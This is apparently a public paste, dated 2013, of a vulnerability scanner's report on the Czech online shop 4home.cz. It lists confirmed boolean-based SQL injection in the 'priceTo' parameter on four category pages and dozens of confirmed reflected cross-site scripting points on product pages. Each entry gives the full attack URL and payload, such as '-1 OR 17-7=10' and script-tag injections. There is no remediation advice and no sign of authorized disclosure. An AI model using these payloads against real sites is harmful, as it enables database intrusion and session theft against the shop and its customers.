sroub3k

4home.cz

Feb 3rd, 2013
  1. +++++++++++++++++++
  2. - http://www.4home.cz/
  3. +++++++++++++++++++
  4.  
  5. ||| Boolean Based SQL Injection
  6.  
  7. Severity: Critical
  8. Confirmation: Confirmed
  9. URL: http://www.4home.cz/bytovy-textil/?akce=1&novinky=1&priceFrom=69&priceTo=-1 OR 17-7=10&skladem=1&vyprodej=1
  10. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  11. Parameter Name: priceTo
  12. Parameter Type: Querystring
  13. Attack Pattern: -1 OR 17-7=10
  14.  
  15. Severity: Critical
  16. Confirmation: Confirmed
  17. URL: http://www.4home.cz/bytove-doplnky/?akce=1&novinky=1&priceFrom=29&priceTo=-1 OR 17-7=10&skladem=1&vyprodej=1
  18. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  19. Parameter Name: priceTo
  20. Parameter Type: Querystring
  21. Attack Pattern: -1 OR 17-7=10
  22.  
  23. Severity: Critical
  24. Confirmation: Confirmed
  25. URL: http://www.4home.cz/koupelna/?akce=1&novinky=1&priceFrom=65&priceTo=-1 OR 17-7=10&skladem=1&vyprodej=1
  26. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  27. Parameter Name: priceTo
  28. Parameter Type: Querystring
  29. Attack Pattern: -1 OR 17-7=10
  30.  
  31. Severity: Critical
  32. Confirmation: Confirmed
  33. URL: http://www.4home.cz/krasa-a-zdravi/?akce=1&novinky=1&priceFrom=49&priceTo=-1 OR 17-7=10&skladem=1&vyprodej=1
  34. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  35. Parameter Name: priceTo
  36. Parameter Type: Querystring
  37. Attack Pattern: -1 OR 17-7=10
  38.  
  39. ||| XSS (Cross-site Scripting)
  40.  
  41. Severity: Important
  42. Confirmation: Confirmed
  43. URL: http://www.4home.cz/.heureka.cz/direct/i/?'"--></style></script><script>alert(0x000059)</script>
  44. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  45. Parameter Name: Query Based
  46. Parameter Type: FullQueryString
  47. Attack Pattern: '"--></style></script><script>alert(0x000059)</script>
  48.  
  49. Severity: Important
  50. Confirmation: Confirmed
  51. URL: http://www.4home.cz/.heureka.cz/direct/?'"--></style></script><script>alert(0x00005E)</script>
  52. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  53. Parameter Name: Query Based
  54. Parameter Type: FullQueryString
  55. Attack Pattern: '"--></style></script><script>alert(0x00005E)</script>
  56.  
  57. Severity: Important
  58. Confirmation: Confirmed
  59. URL: http://www.4home.cz/.heureka.cz/?'"--></style></script><script>alert(0x000061)</script>
  60. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  61. Parameter Name: Query Based
  62. Parameter Type: FullQueryString
  63. Attack Pattern: '"--></style></script><script>alert(0x000061)</script>
  64.  
  65. Severity: Important
  66. Confirmation: Confirmed
  67. URL: http://www.4home.cz/.search.etargetnet.com/?'"--></style></script><script>alert(0x00007F)</script>
  68. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  69. Parameter Name: Query Based
  70. Parameter Type: FullQueryString
  71. Attack Pattern: '"--></style></script><script>alert(0x00007F)</script>
  72.  
  73. Severity: Important
  74. Confirmation: Confirmed
  75. URL: http://www.4home.cz/image.php?size='"--></style></script><script>alert(0x000043)</script>&file=miniatura-jpg-614.jpg
  76. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  77. Parameter Name: size
  78. Parameter Type: Querystring
  79. Attack Pattern: '"--></style></script><script>alert(0x000043)</script>
  80.  
  81. Severity: Important
  82. Confirmation: Confirmed
  83. URL: http://www.4home.cz/sunkovar-orion-5orn131505/?'"--></style></script><script>alert(0x0003E2)</script>
  84. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  85. Parameter Name: Query Based
  86. Parameter Type: FullQueryString
  87. Attack Pattern: '"--></style></script><script>alert(0x0003E2)</script>
  88.  
  89. Severity: Important
  90. Confirmation: Confirmed
  91. URL: http://www.4home.cz/.heureka.cz/direct/i/gjs.php/?'"--></style></script><script>alert(0x000434)</script>
  92. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  93. Parameter Name: Query Based
  94. Parameter Type: FullQueryString
  95. Attack Pattern: '"--></style></script><script>alert(0x000434)</script>
  96.  
  97. Severity: Important
  98. Confirmation: Confirmed
  99. URL: http://www.4home.cz/.search.etargetnet.com/rt.php/?'"--></style></script><script>alert(0x00045A)</script>
  100. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  101. Parameter Name: Query Based
  102. Parameter Type: FullQueryString
  103. Attack Pattern: '"--></style></script><script>alert(0x00045A)</script>
  104.  
  105. Severity: Important
  106. Confirmation: Confirmed
  107. URL: http://www.4home.cz/prikryvka-a-polstar-bila/?'"--></style></script><script>alert(0x00069C)</script>
  108. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  109. Parameter Name: Query Based
  110. Parameter Type: FullQueryString
  111. Attack Pattern: '"--></style></script><script>alert(0x00069C)</script>
  112.  
  113. Severity: Important
  114. Confirmation: Confirmed
  115. URL: http://www.4home.cz/prikryvka-aloe-vera-z-duteho-vlakna/?'"--></style></script><script>alert(0x0006AD)</script>
  116. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  117. Parameter Name: Query Based
  118. Parameter Type: FullQueryString
  119. Attack Pattern: '"--></style></script><script>alert(0x0006AD)</script>
  120.  
  121. Severity: Important
  122. Confirmation: Confirmed
  123. URL: http://www.4home.cz/sada-povleceni-a-polstarku-smoulinka/?'"--></style></script><script>alert(0x000691)</script>
  124. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  125. Parameter Name: Query Based
  126. Parameter Type: FullQueryString
  127. Attack Pattern: '"--></style></script><script>alert(0x000691)</script>
  128.  
  129. Severity: Important
  130. Confirmation: Confirmed
  131. URL: http://www.4home.cz/polstar-aloe-vera-z-duteho-vlakna/?'"--></style></script><script>alert(0x0006AC)</script>
  132. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  133. Parameter Name: Query Based
  134. Parameter Type: FullQueryString
  135. Attack Pattern: '"--></style></script><script>alert(0x0006AC)</script>
  136.  
  137. Severity: Important
  138. Confirmation: Confirmed
  139. URL: http://www.4home.cz/detske-bavlnene-povleceni-marie-cat/?'"--></style></script><script>alert(0x0006CB)</script>
  140. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  141. Parameter Name: Query Based
  142. Parameter Type: FullQueryString
  143. Attack Pattern: '"--></style></script><script>alert(0x0006CB)</script>
  144.  
  145. Severity: Important
  146. Confirmation: Confirmed
  147. URL: http://www.4home.cz/sada-fleecovych-prehozu-hneda-kostka/?'"--></style></script><script>alert(0x000711)</script>
  148. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  149. Parameter Name: Query Based
  150. Parameter Type: FullQueryString
  151. Attack Pattern: '"--></style></script><script>alert(0x000711)</script>
  152.  
  153. Severity: Important
  154. Confirmation: Confirmed
  155. URL: http://www.4home.cz/prehozy-na-sedaci-soupravu-potisk/?'"--></style></script><script>alert(0x00071F)</script>
  156. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  157. Parameter Name: Query Based
  158. Parameter Type: FullQueryString
  159. Attack Pattern: '"--></style></script><script>alert(0x00071F)</script>
  160.  
  161. Severity: Important
  162. Confirmation: Confirmed
  163. URL: http://www.4home.cz/deka-zebra/?'"--></style></script><script>alert(0x000730)</script>
  164. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  165. Parameter Name: Query Based
  166. Parameter Type: FullQueryString
  167. Attack Pattern: '"--></style></script><script>alert(0x000730)</script>
  168.  
  169. Severity: Important
  170. Confirmation: Confirmed
  171. URL: http://www.4home.cz/satenove-povleceni-karton/?'"--></style></script><script>alert(0x00070F)</script>
  172. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  173. Parameter Name: Query Based
  174. Parameter Type: FullQueryString
  175. Attack Pattern: '"--></style></script><script>alert(0x00070F)</script>
  176.  
  177. Severity: Important
  178. Confirmation: Confirmed
  179. URL: http://www.4home.cz/voalova-zaclona/?'"--></style></script><script>alert(0x000746)</script>
  180. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  181. Parameter Name: Query Based
  182. Parameter Type: FullQueryString
  183. Attack Pattern: '"--></style></script><script>alert(0x000746)</script>
  184.  
  185. Severity: Important
  186. Confirmation: Confirmed
  187. URL: http://www.4home.cz/pruhovane-voaly/?'"--></style></script><script>alert(0x00077E)</script>
  188. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  189. Parameter Name: Query Based
  190. Parameter Type: FullQueryString
  191. Attack Pattern: '"--></style></script><script>alert(0x00077E)</script>
  192.  
  193. Severity: Important
  194. Confirmation: Confirmed
  195. URL: http://www.4home.cz/povleceni-rosalina/?'"--></style></script><script>alert(0x000792)</script>
  196. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  197. Parameter Name: Query Based
  198. Parameter Type: FullQueryString
  199. Attack Pattern: '"--></style></script><script>alert(0x000792)</script>
  200.  
  201. Severity: Important
  202. Confirmation: Confirmed
  203. URL: http://www.4home.cz/voalove-zavesy/?'"--></style></script><script>alert(0x000761)</script>
  204. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  205. Parameter Name: Query Based
  206. Parameter Type: FullQueryString
  207. Attack Pattern: '"--></style></script><script>alert(0x000761)</script>
  208.  
  209. Severity: Important
  210. Confirmation: Confirmed
  211. URL: http://www.4home.cz/prehozy-na-sedaci-soupravu-canvas/?'"--></style></script><script>alert(0x000784)</script>
  212. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  213. Parameter Name: Query Based
  214. Parameter Type: FullQueryString
  215. Attack Pattern: '"--></style></script><script>alert(0x000784)</script>
  216.  
  217. Severity: Important
  218. Confirmation: Confirmed
  219. URL: http://www.4home.cz/bavlnene-povleceni-botanika/?'"--></style></script><script>alert(0x0007BB)</script>
  220. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  221. Parameter Name: Query Based
  222. Parameter Type: FullQueryString
  223. Attack Pattern: '"--></style></script><script>alert(0x0007BB)</script>
  224.  
  225. Severity: Important
  226. Confirmation: Confirmed
  227. URL: http://www.4home.cz/gobelinovy-prehoz-na-postel/?'"--></style></script><script>alert(0x0007A6)</script>
  228. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  229. Parameter Name: Query Based
  230. Parameter Type: FullQueryString
  231. Attack Pattern: '"--></style></script><script>alert(0x0007A6)</script>
  232.  
  233. Severity: Important
  234. Confirmation: Confirmed
  235. URL: http://www.4home.cz/bavlnene-povleceni-sofia/?'"--></style></script><script>alert(0x0007D9)</script>
  236. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  237. Parameter Name: Query Based
  238. Parameter Type: FullQueryString
  239. Attack Pattern: '"--></style></script><script>alert(0x0007D9)</script>
  240.  
  241. Severity: Important
  242. Confirmation: Confirmed
  243. URL: http://www.4home.cz/frote-rucniky/?'"--></style></script><script>alert(0x0008E3)</script>
  244. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  245. Parameter Name: Query Based
  246. Parameter Type: FullQueryString
  247. Attack Pattern: '"--></style></script><script>alert(0x0008E3)</script>
  248.  
  249. Severity: Important
  250. Confirmation: Confirmed
  251. URL: http://www.4home.cz/sada-3-plechovych-doz-s-vicky/?'"--></style></script><script>alert(0x0008CE)</script>
  252. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  253. Parameter Name: Query Based
  254. Parameter Type: FullQueryString
  255. Attack Pattern: '"--></style></script><script>alert(0x0008CE)</script>
  256.  
  257. Severity: Important
  258. Confirmation: Confirmed
  259. URL: http://www.4home.cz/zkrapeci-pekac-s-mrizkou/?'"--></style></script><script>alert(0x00090A)</script>
  260. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  261. Parameter Name: Query Based
  262. Parameter Type: FullQueryString
  263. Attack Pattern: '"--></style></script><script>alert(0x00090A)</script>
  264.  
  265. Severity: Important
  266. Confirmation: Confirmed
  267. URL: http://www.4home.cz/pekac-brownie/?'"--></style></script><script>alert(0x0008E8)</script>
  268. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  269. Parameter Name: Query Based
  270. Parameter Type: FullQueryString
  271. Attack Pattern: '"--></style></script><script>alert(0x0008E8)</script>
  272.  
  273. Severity: Important
  274. Confirmation: Confirmed
  275. URL: http://www.4home.cz/sklenene-misky-s-vicky/?'"--></style></script><script>alert(0x000900)</script>
  276. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  277. Parameter Name: Query Based
  278. Parameter Type: FullQueryString
  279. Attack Pattern: '"--></style></script><script>alert(0x000900)</script>
  280.  
  281. Severity: Important
  282. Confirmation: Confirmed
  283. URL: http://www.4home.cz/prehoz-na-postel-s-trasnemi/?'"--></style></script><script>alert(0x00091A)</script>
  284. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  285. Parameter Name: Query Based
  286. Parameter Type: FullQueryString
  287. Attack Pattern: '"--></style></script><script>alert(0x00091A)</script>
  288.  
  289. Severity: Important
  290. Confirmation: Confirmed
  291. URL: http://www.4home.cz/povlaky-na-polstarky-s-fototiskem/?'"--></style></script><script>alert(0x000944)</script>
  292. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  293. Parameter Name: Query Based
  294. Parameter Type: FullQueryString
  295. Attack Pattern: '"--></style></script><script>alert(0x000944)</script>
  296.  
  297. Severity: Important
  298. Confirmation: Confirmed
  299. URL: http://www.4home.cz/pvc-ubrus-jarni-probuzeni/?'"--></style></script><script>alert(0x000957)</script>
  300. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  301. Parameter Name: Query Based
  302. Parameter Type: FullQueryString
  303. Attack Pattern: '"--></style></script><script>alert(0x000957)</script>
  304.  
  305. Severity: Important
  306. Confirmation: Confirmed
  307. URL: http://www.4home.cz/solarni-dekorace-do-jezirka/?'"--></style></script><script>alert(0x000984)</script>
  308. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  309. Parameter Name: Query Based
  310. Parameter Type: FullQueryString
  311. Attack Pattern: '"--></style></script><script>alert(0x000984)</script>
  312.  
  313. Severity: Important
  314. Confirmation: Confirmed
  315. URL: http://www.4home.cz/pvc-ubrus-bily-s-krajkou/?'"--></style></script><script>alert(0x000973)</script>
  316. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  317. Parameter Name: Query Based
  318. Parameter Type: FullQueryString
  319. Attack Pattern: '"--></style></script><script>alert(0x000973)</script>
  320.  
  321. Severity: Important
  322. Confirmation: Confirmed
  323. URL: http://www.4home.cz/smetanovy-ubrus-s-dekoracnimi-behouny/?'"--></style></script><script>alert(0x000995)</script>
  324. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  325. Parameter Name: Query Based
  326. Parameter Type: FullQueryString
  327. Attack Pattern: '"--></style></script><script>alert(0x000995)</script>
  328.  
  329. Severity: Important
  330. Confirmation: Confirmed
  331. URL: http://www.4home.cz/svitici-kaminky/?'"--></style></script><script>alert(0x00099B)</script>
  332. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  333. Parameter Name: Query Based
  334. Parameter Type: FullQueryString
  335. Attack Pattern: '"--></style></script><script>alert(0x00099B)</script>
  336.  
  337. Severity: Important
  338. Confirmation: Confirmed
  339. URL: http://www.4home.cz/darkovy-snehulak/?'"--></style></script><script>alert(0x00099C)</script>
  340. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  341. Parameter Name: Query Based
  342. Parameter Type: FullQueryString
  343. Attack Pattern: '"--></style></script><script>alert(0x00099C)</script>
  344.  
  345. Severity: Important
  346. Confirmation: Confirmed
  347. URL: http://www.4home.cz/ratanove-houpaci-kreslo-kartini-wicker-mix/?'"--></style></script><script>alert(0x000B79)</script>
  348. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  349. Parameter Name: Query Based
  350. Parameter Type: FullQueryString
  351. Attack Pattern: '"--></style></script><script>alert(0x000B79)</script>
  352.  
  353. Severity: Important
  354. Confirmation: Confirmed
  355. URL: http://www.4home.cz/voskova-led-svicka-solight-s-dalkovym-ovladacem-kvadr/?'"--></style></script><script>alert(0x000B75)</script>
  356. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  357. Parameter Name: Query Based
  358. Parameter Type: FullQueryString
  359. Attack Pattern: '"--></style></script><script>alert(0x000B75)</script>
  360.  
  361. Severity: Important
  362. Confirmation: Confirmed
  363. URL: http://www.4home.cz/voskova-led-svicka-solight-valec-zluta/?'"--></style></script><script>alert(0x000B73)</script>
  364. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  365. Parameter Name: Query Based
  366. Parameter Type: FullQueryString
  367. Attack Pattern: '"--></style></script><script>alert(0x000B73)</script>
  368.  
  369. Severity: Important
  370. Confirmation: Confirmed
  371. URL: http://www.4home.cz/tristar-df-6500-bio-ethanol-krb/?'"--></style></script><script>alert(0x000B7B)</script>
  372. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  373. Parameter Name: Query Based
  374. Parameter Type: FullQueryString
  375. Attack Pattern: '"--></style></script><script>alert(0x000B7B)</script>
  376.  
  377. Severity: Important
  378. Confirmation: Confirmed
  379. URL: http://www.4home.cz/kapradinova-truhla/?'"--></style></script><script>alert(0x000B8A)</script>
  380. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  381. Parameter Name: Query Based
  382. Parameter Type: FullQueryString
  383. Attack Pattern: '"--></style></script><script>alert(0x000B8A)</script>
  384.  
  385. Severity: Important
  386. Confirmation: Confirmed
  387. URL: http://www.4home.cz/lucerna-s-andelem/?'"--></style></script><script>alert(0x000B83)</script>
  388. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  389. Parameter Name: Query Based
  390. Parameter Type: FullQueryString
  391. Attack Pattern: '"--></style></script><script>alert(0x000B83)</script>
  392.  
  393. Severity: Important
  394. Confirmation: Confirmed
  395. URL: http://www.4home.cz/kapradinova-zasuvka-do-skrine/?'"--></style></script><script>alert(0x000B89)</script>
  396. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  397. Parameter Name: Query Based
  398. Parameter Type: FullQueryString
  399. Attack Pattern: '"--></style></script><script>alert(0x000B89)</script>
  400.  
  401. Severity: Important
  402. Confirmation: Confirmed
  403. URL: http://www.4home.cz/stolni-lampa-rabalux-4901/?'"--></style></script><script>alert(0x000B91)</script>
  404. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  405. Parameter Name: Query Based
  406. Parameter Type: FullQueryString
  407. Attack Pattern: '"--></style></script><script>alert(0x000B91)</script>
  408.  
  409. Severity: Important
  410. Confirmation: Confirmed
  411. URL: http://www.4home.cz/sada-bilych-ruzi-5-kusu/?'"--></style></script><script>alert(0x000BA6)</script>
  412. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  413. Parameter Name: Query Based
  414. Parameter Type: FullQueryString
  415. Attack Pattern: '"--></style></script><script>alert(0x000BA6)</script>
  416.  
  417. Severity: Important
  418. Confirmation: Confirmed
  419. URL: http://www.4home.cz/solarni-svicen/?'"--></style></script><script>alert(0x000BAA)</script>
  420. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  421. Parameter Name: Query Based
  422. Parameter Type: FullQueryString
  423. Attack Pattern: '"--></style></script><script>alert(0x000BAA)</script>
  424.  
  425. Severity: Important
  426. Confirmation: Confirmed
  427. URL: http://www.4home.cz/priborove-hodiny-cerne/?'"--></style></script><script>alert(0x000C03)</script>
  428. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  429. Parameter Name: Query Based
  430. Parameter Type: FullQueryString
  431. Attack Pattern: '"--></style></script><script>alert(0x000C03)</script>
  432.  
  433. Severity: Important
  434. Confirmation: Confirmed
  435. URL: http://www.4home.cz/bioethanolovy-krb/?'"--></style></script><script>alert(0x000C10)</script>
  436. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  437. Parameter Name: Query Based
  438. Parameter Type: FullQueryString
  439. Attack Pattern: '"--></style></script><script>alert(0x000C10)</script>
  440.  
  441. Severity: Important
  442. Confirmation: Confirmed
  443. URL: http://www.4home.cz/ratanova-komoda/?'"--></style></script><script>alert(0x000C11)</script>
  444. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  445. Parameter Name: Query Based
  446. Parameter Type: FullQueryString
  447. Attack Pattern: '"--></style></script><script>alert(0x000C11)</script>
  448.  
  449. Severity: Important
  450. Confirmation: Confirmed
  451. URL: http://www.4home.cz/vinoteka-hyundai-vin32dz-78-l/?'"--></style></script><script>alert(0x000C0E)</script>
  452. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  453. Parameter Name: Query Based
  454. Parameter Type: FullQueryString
  455. Attack Pattern: '"--></style></script><script>alert(0x000C0E)</script>
  456.  
  457. Severity: Important
  458. Confirmation: Confirmed
  459. URL: http://www.4home.cz/vinoteka-hyundai-vin12a/?'"--></style></script><script>alert(0x000C21)</script>
  460. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  461. Parameter Name: Query Based
  462. Parameter Type: FullQueryString
  463. Attack Pattern: '"--></style></script><script>alert(0x000C21)</script>
  464.  
  465. Severity: Important
  466. Confirmation: Confirmed
  467. URL: http://www.4home.cz/retezovy-drzak-na-vino/?'"--></style></script><script>alert(0x000C23)</script>
  468. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  469. Parameter Name: Query Based
  470. Parameter Type: FullQueryString
  471. Attack Pattern: '"--></style></script><script>alert(0x000C23)</script>
  472.  
  473. Severity: Important
  474. Confirmation: Confirmed
  475. URL: http://www.4home.cz/pokojova-dekorace-slunecnice/?'"--></style></script><script>alert(0x000C22)</script>
  476. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  477. Parameter Name: Query Based
  478. Parameter Type: FullQueryString
  479. Attack Pattern: '"--></style></script><script>alert(0x000C22)</script>
  480.  
  481. Severity: Important
  482. Confirmation: Confirmed
  483. URL: http://www.4home.cz/bytove-doplnky/?akce=1&novinky=1&priceFrom=29'"--></style></script><script>alert(0x000C57)</script>&priceTo=7990&skladem=1&vyprodej=1
  484. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  485. Parameter Name: priceFrom
  486. Parameter Type: Querystring
  487. Attack Pattern: 29'"--></style></script><script>alert(0x000C57)</script>
  488.  
  489. Severity: Important
  490. Confirmation: Confirmed
  491. URL: http://www.4home.cz/varic-vajec/?'"--></style></script><script>alert(0x000E90)</script>
  492. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  493. Parameter Name: Query Based
  494. Parameter Type: FullQueryString
  495. Attack Pattern: '"--></style></script><script>alert(0x000E90)</script>
  496.  
  497. Severity: Important
  498. Confirmation: Confirmed
  499. URL: http://www.4home.cz/sendvicovac-eta-0151-90000/?'"--></style></script><script>alert(0x000E95)</script>
  500. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  501. Parameter Name: Query Based
  502. Parameter Type: FullQueryString
  503. Attack Pattern: '"--></style></script><script>alert(0x000E95)</script>
  504.  
  505. Severity: Important
  506. Confirmation: Confirmed
  507. URL: http://www.4home.cz/vyhrivany-polstar-ve-tvaru-srdce/?'"--></style></script><script>alert(0x000E91)</script>
  508. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  509. Parameter Name: Query Based
  510. Parameter Type: FullQueryString
  511. Attack Pattern: '"--></style></script><script>alert(0x000E91)</script>
  512.  
  513. Severity: Important
  514. Confirmation: Confirmed
  515. URL: http://www.4home.cz/ponorny-mixer-eta-1015-90000-spesso/?'"--></style></script><script>alert(0x000EF2)</script>
  516. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  517. Parameter Name: Query Based
  518. Parameter Type: FullQueryString
  519. Attack Pattern: '"--></style></script><script>alert(0x000EF2)</script>
  520.  
  521. Severity: Important
  522. Confirmation: Confirmed
  523. URL: http://www.4home.cz/citrusovac-eta-0037-90050-fruito/?'"--></style></script><script>alert(0x000EF4)</script>
  524. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  525. Parameter Name: Query Based
  526. Parameter Type: FullQueryString
  527. Attack Pattern: '"--></style></script><script>alert(0x000EF4)</script>
  528.  
  529. Severity: Important
  530. Confirmation: Confirmed
  531. URL: http://www.4home.cz/koupelnovy-ohrivac-tristar-ka-5010/?'"--></style></script><script>alert(0x000F04)</script>
  532. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  533. Parameter Name: Query Based
  534. Parameter Type: FullQueryString
  535. Attack Pattern: '"--></style></script><script>alert(0x000F04)</script>
  536.  
  537. Severity: Important
  538. Confirmation: Confirmed
  539. URL: http://www.4home.cz/ponorny-ohrivac-eta-0191-90060/?'"--></style></script><script>alert(0x000F06)</script>
  540. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  541. Parameter Name: Query Based
  542. Parameter Type: FullQueryString
  543. Attack Pattern: '"--></style></script><script>alert(0x000F06)</script>
  544.  
  545. Severity: Important
  546. Confirmation: Confirmed
  547. URL: http://www.4home.cz/indukcni-varic-eta-0110-90000-sklokeramicky/?'"--></style></script><script>alert(0x001015)</script>
  548. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  549. Parameter Name: Query Based
  550. Parameter Type: FullQueryString
  551. Attack Pattern: '"--></style></script><script>alert(0x001015)</script>
  552.  
  553. Severity: Important
  554. Confirmation: Confirmed
  555. URL: http://www.4home.cz/espresso-krups-kp150231-nescafe-dolce-gusto-genio-whitechocolate/?'"--></style></script><script>alert(0x001017)</script>
  556. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  557. Parameter Name: Query Based
  558. Parameter Type: FullQueryString
  559. Attack Pattern: '"--></style></script><script>alert(0x001017)</script>
  560.  
  561. Severity: Important
  562. Confirmation: Confirmed
  563. URL: http://www.4home.cz/rucni-slehac-eta-fresco-bila-1047-90010/?'"--></style></script><script>alert(0x001013)</script>
  564. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  565. Parameter Name: Query Based
  566. Parameter Type: FullQueryString
  567. Attack Pattern: '"--></style></script><script>alert(0x001013)</script>
  568.  
  569. Severity: Important
  570. Confirmation: Confirmed
  571. URL: http://www.4home.cz/rucni-slehac-eta-1088-90000-multiplo/?'"--></style></script><script>alert(0x001007)</script>
  572. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  573. Parameter Name: Query Based
  574. Parameter Type: FullQueryString
  575. Attack Pattern: '"--></style></script><script>alert(0x001007)</script>
  576.  
  577. Severity: Important
  578. Confirmation: Confirmed
  579. URL: http://www.4home.cz/usporna-friteza/?'"--></style></script><script>alert(0x00101D)</script>
  580. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  581. Parameter Name: Query Based
  582. Parameter Type: FullQueryString
  583. Attack Pattern: '"--></style></script><script>alert(0x00101D)</script>
  584.  
  585. Severity: Important
  586. Confirmation: Confirmed
  587. URL: http://www.4home.cz/elektricka-panev-concept-pk-9010-vitacera-darek/?'"--></style></script><script>alert(0x001024)</script>
  588. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  589. Parameter Name: Query Based
  590. Parameter Type: FullQueryString
  591. Attack Pattern: '"--></style></script><script>alert(0x001024)</script>
  592.  
  593. Severity: Important
  594. Confirmation: Confirmed
  595. URL: http://www.4home.cz/rucniky-venera-s-vysivanou-bordurou-2-kusy/?'"--></style></script><script>alert(0x00114D)</script>
  596. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  597. Parameter Name: Query Based
  598. Parameter Type: FullQueryString
  599. Attack Pattern: '"--></style></script><script>alert(0x00114D)</script>
  600.  
  601. Severity: Important
  602. Confirmation: Confirmed
